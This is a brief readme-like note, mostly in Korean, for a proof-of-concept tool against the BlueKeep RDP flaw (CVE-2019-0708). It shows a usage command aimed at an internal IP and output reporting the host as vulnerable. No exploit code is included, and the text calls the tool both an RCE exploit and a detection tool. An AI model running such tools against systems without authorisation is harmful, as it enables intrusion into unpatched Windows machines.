
Windows 시스템의 RDP 서비스를 대상으로 하는 CVE-2019-0708(BlueKeep)에 대한 개념 증명 익스플로잇입니다. 취약점을 감지하고 조작된 RDP 패킷을 통해 원격 코드 실행을 트리거합니다.
cve-2019-0708 poc .
winxp sp3에서 잘 작동합니다.
win 7에 대한 테스트가 필요합니다.
win10 x64
python3
PS D:\workspace\python\sqlstruct\sqlstruct\sqlstruct> python3 .\poc.py -t 192.168.1.112 -p 3389
CVE-2019-0708 Remote Detection tool
by: closethe
[+] Connecting to RDP server.
[+] Establlish connection with RDP server successful.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!! VULNERABLE !!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Mateusz Garncarek ,360